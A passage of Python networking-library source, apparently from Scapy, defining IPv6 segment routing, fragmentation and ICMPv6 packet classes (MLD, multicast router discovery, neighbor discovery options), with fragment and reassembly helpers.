class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Pad1 TLV"
# RFC8754 sect 2.1.1.1
fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - PadN TLV"
# RFC8754 sect 2.1.1.2
fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - HMAC TLV"
# RFC8754 sect 2.1.2
fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="hmac",
adjust=lambda _, x: x + 48),
BitField("D", 0, 1),
BitField("reserved", 0, 15),
IntField("hmackeyid", 0),
StrLenField("hmac", "",
length_from=lambda pkt: pkt.len - 48)]
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Segment Routing"
# RFC8754 sect 2. + flag bits from draft 06
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteField("type", 4),
ByteField("segleft", None),
ByteField("lastentry", None),
BitField("unused1", 0, 1),
BitField("protected", 0, 1),
BitField("oam", 0, 1),
BitField("alert", 0, 1),
BitField("hmac", 0, 1),
BitField("unused2", 0, 3),
ShortField("tag", 0),
IP6ListField("addresses", ["::1"],
count_from=lambda pkt: (pkt.lastentry + 1)),
PacketListField("tlv_objects", [],
IPv6ExtHdrSegmentRoutingTLV,
length_from=lambda pkt: 8 * pkt.len - 16 * (
pkt.lastentry + 1
))]
overload_fields = {IPv6: {"nh": 43}}
def post_build(self, pkt, pay):
if self.len is None:
            # The extension must be aligned on 8 bytes
tmp_mod = (-len(pkt) + 8) % 8
if tmp_mod == 1:
tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
pkt += raw(tlv)
elif tmp_mod >= 2:
# Add the padding extension
tmp_pad = b"\x00" * (tmp_mod - 2)
tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
pkt += raw(tlv)
tmp_len = (len(pkt) - 8) // 8
pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
if self.segleft is None:
tmp_len = len(self.addresses)
if tmp_len:
tmp_len -= 1
pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
if self.lastentry is None:
lastentry = len(self.addresses)
if lastentry == 0:
warning(
"IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
)
else:
lastentry -= 1
pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
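# Build sketch (illustrative; addresses are examples): len, segleft and
# lastentry are all computed in post_build when left to None:
#
#   srh = IPv6(dst="2001:db8::1") / IPv6ExtHdrSegmentRouting(
#       addresses=["2001:db8::2", "2001:db8::3"]) / UDP(dport=4739)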
# Fragmentation Header #
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None)]
overload_fields = {IPv6: {"nh": 44}}
def guess_payload_class(self, p):
if self.offset > 0:
return Raw
else:
return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
def defragment6(packets):
"""
    Performs defragmentation of a list of IPv6 packets. Packets are
    reordered, invalid fragments are dropped, and any missing data is
    filled in with 'X' characters.
"""
# Remove non fragments
lst = [x for x in packets if IPv6ExtHdrFragment in x]
if not lst:
return []
id = lst[0][IPv6ExtHdrFragment].id
llen = len(lst)
lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
if len(lst) != llen:
warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
# reorder fragments
res = []
while lst:
min_pos = 0
min_offset = lst[0][IPv6ExtHdrFragment].offset
        for p in lst:
            cur_offset = p[IPv6ExtHdrFragment].offset
            if cur_offset < min_offset:
                min_pos = lst.index(p)
                min_offset = cur_offset
        res.append(lst[min_pos])
        del lst[min_pos]
# regenerate the fragmentable part
fragmentable = b""
for p in res:
q = p[IPv6ExtHdrFragment]
offset = 8 * q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
fragmentable += b"X" * (offset - len(fragmentable))
fragmentable += raw(q.payload)
# Regenerate the unfragmentable part.
q = res[0].copy()
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
    del q.plen
if q[IPv6].underlayer:
q[IPv6] = IPv6(raw(q[IPv6]))
else:
q = IPv6(raw(q))
return q
def fragment6(pkt, fragSize):
"""
    Performs fragmentation of an IPv6 packet. The 'fragSize' argument is the
    expected maximum size of the fragment data (MTU). The list of packets is
    returned.
    If the packet does not contain an IPv6ExtHdrFragment class, one is added
    to the first IPv6 layer found. If no IPv6 layer exists, the packet is
    returned in the result list unmodified.
"""
pkt = pkt.copy()
if IPv6ExtHdrFragment not in pkt:
if IPv6 not in pkt:
return [pkt]
layer3 = pkt[IPv6]
data = layer3.payload
frag = IPv6ExtHdrFragment(nh=layer3.nh)
layer3.remove_payload()
del(layer3.nh)
del(layer3.plen)
frag.add_payload(data)
layer3.add_payload(frag)
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can't be bigger than 65535 bytes, please use a Jumbo payload.")  # noqa: E501
return []
s = raw(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets; the last
    # fragment can be anything below the MTU.
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart / fragHeader / fragPart]
remain = fragPartStr
res = []
    fragOffset = 0  # offset, incremented during creation
fragId = random.randint(0, 0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize // 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
res.append(tempo)
else:
            fragHeader.offset = fragOffset  # update offset
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
res.append(tempo)
break
return res
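# Round-trip sketch (illustrative; the address is an example): fragment a
# large echo request into <= 1280-byte packets, then rebuild it:
#
#   big = IPv6(dst="2001:db8::1") / ICMPv6EchoRequest(data=b"A" * 4000)
#   frags = fragment6(big, 1280)
#   whole = defragment6(frags)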
#############################################################################
#############################################################################
# ICMPv6* Classes #
#############################################################################
#############################################################################
icmp6typescls = {1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery", # MLDv1 or MLDv2
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
# 138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
143: "ICMPv6MLReport2",
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
# 148: Do Me - SEND related - RFC 3971
# 149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
# 154: Do Me - FMIPv6 Messages - RFC 5568
155: "ICMPv6RPL", # RFC 6550
}
icmp6typesminhdrlen = {1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
# 139:
# 140
141: 8,
142: 8,
143: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4,
155: 4
}
icmp6types = {1: "Destination unreachable",
2: "Packet too big",
3: "Time exceeded",
4: "Parameter problem",
100: "Private Experimentation",
101: "Private Experimentation",
128: "Echo Request",
129: "Echo Reply",
130: "MLD Query",
131: "MLD Report",
132: "MLD Done",
133: "Router Solicitation",
134: "Router Advertisement",
135: "Neighbor Solicitation",
136: "Neighbor Advertisement",
137: "Redirect Message",
138: "Router Renumbering",
139: "ICMP Node Information Query",
140: "ICMP Node Information Response",
141: "Inverse Neighbor Discovery Solicitation Message",
142: "Inverse Neighbor Discovery Advertisement Message",
143: "MLD Report Version 2",
144: "Home Agent Address Discovery Request Message",
145: "Home Agent Address Discovery Reply Message",
146: "Mobile Prefix Solicitation",
147: "Mobile Prefix Advertisement",
148: "Certification Path Solicitation",
149: "Certification Path Advertisement",
151: "Multicast Router Advertisement",
152: "Multicast Router Solicitation",
153: "Multicast Router Termination",
155: "RPL Control Message",
200: "Private Experimentation",
201: "Private Experimentation"}
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum is None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2] + struct.pack("!H", chksum) + p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self, p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ByteEnumField("type", 1, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
StrField("msgbody", "")]
# RFC 2460 #
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ByteEnumField("type", 1, icmp6types),
ByteEnumField("code", 0, {0: "No route to destination",
1: "Communication with destination administratively prohibited", # noqa: E501
2: "Beyond scope of source address", # noqa: E501
3: "Address unreachable",
4: "Port unreachable"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused", 0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ByteEnumField("type", 2, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("mtu", 1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ByteEnumField("type", 3, icmp6types),
ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1: "fragment reassembly time exceeded"}), # noqa: E501
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused", 0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ByteEnumField("type", 4, icmp6types),
ByteEnumField(
"code", 0,
{0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered",
3: "first fragment has incomplete header chain"}),
XShortField("cksum", None),
IntField("ptr", 6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", 0),
XShortField("seq", 0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
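# Matching sketch (illustrative): a reply answers a request only when id,
# seq and data all match:
#
#   req = IPv6(dst="::1") / ICMPv6EchoRequest(id=7, seq=1, data=b"x")
#   rep = IPv6(dst="::1") / ICMPv6EchoReply(id=7, seq=1, data=b"x")
#   rep.answers(req)  # -> True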
# ICMPv6 Multicast Listener Discovery (RFC2710) #
# All MLD messages are emitted with a link-local source address
# -> ensure this in post_build if none is specified
# The Hop-Limit value must be 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr", "::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
def answers(self, query):
"""Check the query type"""
return ICMPv6MLQuery in query
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
name = "MLDv2 - Multicast Listener Query"
fields_desc = [ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 10000),
ShortField("reserved", 0),
IP6Field("mladdr", "::"),
BitField("Resv", 0, 4),
BitField("S", 0, 1),
BitField("QRV", 0, 3),
ByteField("QQIC", 0),
ShortField("sources_number", None),
IP6ListField("sources", [],
count_from=lambda pkt: pkt.sources_number)]
    # RFC 3810 - Message Formats
overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
def post_build(self, packet, payload):
"""Compute the 'sources_number' field when needed"""
if self.sources_number is None:
srcnum = struct.pack("!H", len(self.sources))
packet = packet[:26] + srcnum + packet[28:]
return _ICMPv6.post_build(self, packet, payload)
class ICMPv6MLDMultAddrRec(Packet):
name = "ICMPv6 MLDv2 - Multicast Address Record"
fields_desc = [ByteField("rtype", 4),
FieldLenField("auxdata_len", None,
length_of="auxdata",
fmt="B"),
FieldLenField("sources_number", None,
length_of="sources",
adjust=lambda p, num: num // 16),
IP6Field("dst", "::"),
IP6ListField("sources", [],
length_from=lambda p: 16 * p.sources_number),
StrLenField("auxdata", "",
length_from=lambda p: p.auxdata_len)]
def default_payload_class(self, packet):
"""Multicast Address Record followed by another one"""
return self.__class__
class ICMPv6MLReport2(_ICMPv6): # RFC 3810
name = "MLDv2 - Multicast Listener Report"
fields_desc = [ByteEnumField("type", 143, icmp6types),
ByteField("res", 0),
XShortField("cksum", None),
ShortField("reserved", 0),
ShortField("records_number", None),
PacketListField("records", [],
ICMPv6MLDMultAddrRec,
count_from=lambda p: p.records_number)]
    # RFC 3810 - Message Formats
overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
def post_build(self, packet, payload):
"""Compute the 'records_number' field when needed"""
if self.records_number is None:
recnum = struct.pack("!H", len(self.records))
packet = packet[:6] + recnum + packet[8:]
return _ICMPv6.post_build(self, packet, payload)
def answers(self, query):
"""Check the query type"""
return isinstance(query, ICMPv6MLQuery2)
# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
# ICMPv6 Neighbor Discovery (RFC 2461) #
icmp6ndopts = {1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recursive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
# 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
# 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
# 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
# 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
# 15: Do Me,
# 16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
                  # 20: Do Me,
                  # 21: Do Me,
                  # 22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
icmp6ndraprefs = {0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low"} # RFC 4191
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self, p):
if len(p) > 1:
return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ByteField("type", None),
FieldLenField("len", None, length_of="data", fmt="B",
adjust=lambda pkt, x: x + 2),
StrLenField("data", "",
length_from=lambda pkt: pkt.len - 2)]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revisit the use of ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY)]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ByteField("type", 3),
ByteField("len", 4),
ByteField("prefixlen", 64),
BitField("L", 1, 1),
BitField("A", 1, 1),
BitField("R", 0, 1),
BitField("res1", 0, 5),
XIntField("validlifetime", 0xffffffff),
XIntField("preferredlifetime", 0xffffffff),
XIntField("res2", 0x00000000),
IP6Field("prefix", "::")]
def mysummary(self):
return self.sprintf("%name% %prefix%/%prefixlen% "
"On-link %L% Autonomous Address %A% "
"Router Address %R%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501
PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501
self.cur_shift = cur_shift
def getfield(self, pkt, s):
tmp_len = self.length_from(pkt)
i = self.m2i(pkt, s[:tmp_len])
return s[tmp_len:], i
def m2i(self, pkt, m):
s = None
        try:  # It can happen that we get something shorter than 40 bytes
s = self.cls(m)
except Exception:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = raw(x)
tmp_len = len(s)
r = (tmp_len + self.cur_shift) % 8
tmp_len = tmp_len - r
return s[:tmp_len]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# TODO: add a post_build to recompute the length (as a multiple of 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ByteField("type", 4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust=lambda pkt, x:(x + 8) // 8),
StrFixedLenField("res", b"\x00" * 6, 6),
TruncPktLenField("pkt", b"", IPv6, 8,
length_from=lambda pkt: 8 * pkt.len - 8)]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ByteField("type", 5),
ByteField("len", 1),
XShortField("res", 0),
IntField("mtu", 1280)]
def mysummary(self):
return self.sprintf("%name% %mtu%")
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0)]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ByteField("type", 7),
ByteField("len", 1),
ShortField("res", 0),
IntField("advint", 0)]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ByteField("type", 8),
ByteField("len", 1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ByteField("type", 17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address"}),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::")]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
fields_desc = [ByteField("type", 18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::")]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router", # noqa: E501
6: "No preifx info available for AP identified by the LLA", # noqa: E501
7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
fields_desc = [ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY)] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::")]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8 * (pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
tmp_len = self.length_from(pkt)
p = s[:tmp_len]
if tmp_len < 16:
p += b'\x00' * (16 - tmp_len)
return s[tmp_len:], self.m2i(pkt, p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
tmp_len = pkt.len
if x is None:
x = "::"
if tmp_len is None:
tmp_len = 1
x = inet_pton(socket.AF_INET6, x)
if tmp_len is None:
return x
if tmp_len in [0, 1]:
return b""
if tmp_len in [2, 3]:
return x[:8 * (tmp_len - 1)]
return x + b'\x00' * 8 * (tmp_len - 3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ByteField("type", 24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust=lambda pkt, x: x // 8 + 1),
ByteField("plen", None),
BitField("res1", 0, 3),
BitEnumField("prf", 0, 2, icmp6ndraprefs),
BitField("res2", 0, 3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None)]
def mysummary(self):
return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
